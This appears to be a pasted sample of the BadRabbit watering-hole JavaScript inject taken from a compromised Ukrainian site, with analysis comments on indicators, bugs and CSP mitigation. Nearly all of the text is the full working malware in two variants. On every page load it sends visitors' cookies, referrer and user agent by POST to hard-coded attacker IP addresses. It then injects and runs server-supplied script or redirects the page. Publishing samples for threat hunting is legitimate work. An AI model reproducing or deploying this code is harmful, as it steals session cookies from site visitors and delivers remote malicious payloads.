ydklijnsma

BadRabbit/NotPetya inject on i24[.]com[.]ua/js/page-main.js

Oct 26th, 2017
// Analysis notes added to the sample as posted; the code itself is unchanged.
// Collection endpoint that the gathered fields are POSTed to: plaintext HTTP
// to a bare IP address. This is the network indicator to hunt for in proxy
// and egress logs.
var REMOTE_URL = 'http://172.97.69.79/i/';

// XHR timeout in milliseconds, applied in execute_request.
var C_TIMEOUT = 20000;
  4.  
// Builds the visitor profile that is sent to REMOTE_URL.
// Every field is readable by any script running in the page: the referrer,
// the user agent, whether any script-visible cookie exists, the full
// script-visible cookie string, and the hostname of the compromised site.
// Cookies flagged HttpOnly are not exposed through document.cookie and so
// do not appear in 'Tr.Cookie'. The key 'Tr.Domen' is spelled that way in the
// sample.
function analyze_traffic() {
  return {
    'Tr.Referer': document.referrer,
    'Tr.Agent': navigator.userAgent,
    'Tr.CookieState': !!document.cookie,
    'Tr.Cookie': document.cookie,
    'Tr.Domen': window.location.hostname
  };
}
  14.  
// Sends `post` (a plain object) as a form-encoded asynchronous POST to `url`.
// `callback` receives the response body only when the request finishes with
// HTTP 200; other statuses, timeouts and network errors are ignored silently,
// so a blocked or sinkholed endpoint leaves no visible trace on the page.
function execute_request(post, url, callback) {
  var xhr = init_xhr();
  if (!!xhr) {
    xhr.open('POST', url);
    xhr.timeout = C_TIMEOUT;
    xhr.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');
    xhr.onreadystatechange = function () {
      // readyState 4 is DONE; the handler also fires for intermediate states.
      if (xhr.readyState == 4 && xhr.status == 200) {
        callback(xhr.responseText);
      }
    };
    // build_query does no percent-encoding: the body is raw key=value pairs.
    var content = build_query(post);
    xhr.send(content);
  }
}
  30.  
// Acts on the server's JSON reply, which is expected to carry
// InjectionString (URL-encoded) and InjectionType.
// InjectionType === 1 redirects the whole page to the decoded string; any
// other value hands the decoded string to write_on_page for DOM injection.
// Which of the two happens is decided entirely by the server per response.
// JSON.parse throws on a non-JSON body and nothing here catches it, so a
// malformed reply simply aborts the handler.
function apply_payload(response) {
  if (response) {
    var json_result = JSON.parse(response);
    if (json_result) {
      var inject_string = urldecode(json_result.InjectionString);
      if (json_result.InjectionType === 1) {
        window.location = inject_string;
      } else {
        write_on_page(inject_string);
      }
    }
  }
}
  44.  
// Appends server-supplied HTML to <body> inside a div with id "response" and
// then forces the <script> elements it contains to run. Scripts inserted via
// innerHTML are not executed by the browser, which is why each one's inline
// text is copied into a freshly created <script> element (which does execute
// when appended) and the inert original is removed. Only innerHTML is copied,
// so a script that relies on a src attribute is not re-created.
// Analysis notes: `scripts` is a live HTMLCollection, and removing scripts[i]
// while iterating forward shifts the remaining entries, so the loop does not
// visit every element. A CSP script-src without 'unsafe-inline' would block
// the re-created inline scripts. The div#response element is the DOM marker
// this variant leaves behind.
function write_on_page(content) {
  var div = document.createElement('div');
  div.id = 'response';
  div.innerHTML = content;
  document.body.appendChild(div);
  var scripts = div.getElementsByTagName('script');
  if (scripts.length > 0) {
    for (var i = 0; i < scripts.length; i++) {
      var script = document.createElement('script');
      script.innerHTML = scripts[i].innerHTML;
      document.body.appendChild(script);
      scripts[i].parentNode.removeChild(scripts[i]);
    }
  }
}
  60.  
// Serialises `post` into key=value&key=value. Values are not percent-encoded,
// so a cookie string containing '&' or '=' (normal for document.cookie) is
// sent as-is and is ambiguous to a strict form parser. hasOwnProperty skips
// inherited keys.
function build_query(post) {
  var post_query = [];
  for (var k in post) {
    if (post.hasOwnProperty(k)) {
      post_query.push(k + '=' + post[k]);
    }
  }
  return post_query.join('&');
}
  70.  
// Returns an XMLHttpRequest, falling back to the legacy ActiveX MSXML ProgIDs
// (newest first) on old Internet Explorer. Returns undefined when neither is
// available or every ActiveX constructor throws; callers test the result
// before using it.
function init_xhr() {
  if (!!window.XMLHttpRequest) {
    return new XMLHttpRequest();
  } else if (!!window.ActiveXObject) {
    var xhr_array = [
      'Msxml2.XMLHTTP.6.0',
      'Msxml2.XMLHTTP.3.0',
      'Msxml2.XMLHTTP',
      'Microsoft.XMLHTTP'
    ];
    for (var i = 0; i < xhr_array.length; i++) {
      try {
        return new ActiveXObject(xhr_array[i]);
      }
      catch (e) {
        // ProgID not registered on this host; try the next one.
      }
    }
  }
}
  90.  
// Percent-decodes `data`. Note the order of operations: the '+' -> '%20'
// substitution runs after decodeURIComponent, so any '+' present in the
// decoded text becomes the literal characters "%20" rather than a space.
// decodeURIComponent throws on malformed sequences and nothing here catches
// it.
function urldecode(data) {
  return decodeURIComponent(data).replace(/\+/g, '%20');
}
  94.  
// Entry point: runs at script load, so every page view sends one beacon.
// Profile the visitor and POST it to REMOTE_URL; the reply drives either a
// redirect or a DOM injection through apply_payload.
var traffic = analyze_traffic();
execute_request(traffic, REMOTE_URL, apply_payload);
  98.  
  99.  
// Second, minified variant of the same loader, expanded here for readability
// (tokens unchanged). Differences from the functions above: a different
// collection endpoint, a 10 s timeout, plain field names
// (agent/referer/cookie/domain/c_state), the ActiveX ProgIDs tried
// oldest-first, a div with id "ans" as the DOM marker, and no re-execution of
// injected <script> elements: only innerHTML is set.
// Analysis notes: ActiveXObject is called without `new`, unlike init_xhr
// above, and `catch(e)` shadows the function's own name inside the empty
// handler.
function e(d){
  var xhr=null;
  if(!!window.XMLHttpRequest){
    xhr=new XMLHttpRequest();
  }else if(!!window.ActiveXObject){
    var xhrs=['Microsoft.XMLHTTP','Msxml2.XMLHTTP','Msxml2.XMLHTTP.3.0','Msxml2.XMLHTTP.6.0'];
    for(var i=0;i<xhrs.length;i++){
      try{
        xhr=ActiveXObject(xhrs[i]);
        break;
      }catch(e){}
    }
  }
  if(!!xhr){
    // Network indicator: plaintext HTTP POST to a bare IP address.
    xhr.open('POST', 'http://185.149.120.3/scholargoogle/');
    xhr.timeout=10000;
    xhr.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');
    xhr.onreadystatechange=function (){
      // Only an HTTP 200 reply is acted on; everything else is ignored.
      if(xhr.readyState == 4 && xhr.status == 200){
        var resp=xhr.responseText;
        if(resp){
          var fans=JSON.parse(resp);
          if(fans){
            // Same decode-then-replace order as urldecode above.
            var an_s=decodeURIComponent(fans.InjectionString).replace(/\+/g, '%20');
            // DOM marker left behind: a div with id "ans".
            var da=document.createElement('div');
            da.id='ans';
            da.innerHTML=an_s;
            document.body.appendChild(da);
          }
        }
      }
    };
    // Form body without percent-encoding, as in build_query above.
    var pd=[];
    for(var k in d){
      if(d.hasOwnProperty(k)){
        pd.push(k+'='+d[k]);
      }
    }
    var dc=pd.join('&');
    xhr.send(dc);
  }
}
// Fires at load with the same visitor profile under different field names.
e({'agent':navigator.userAgent,'referer':document.referrer,'cookie':document.cookie,'domain':window.location.hostname,'c_state':!!document.cookie});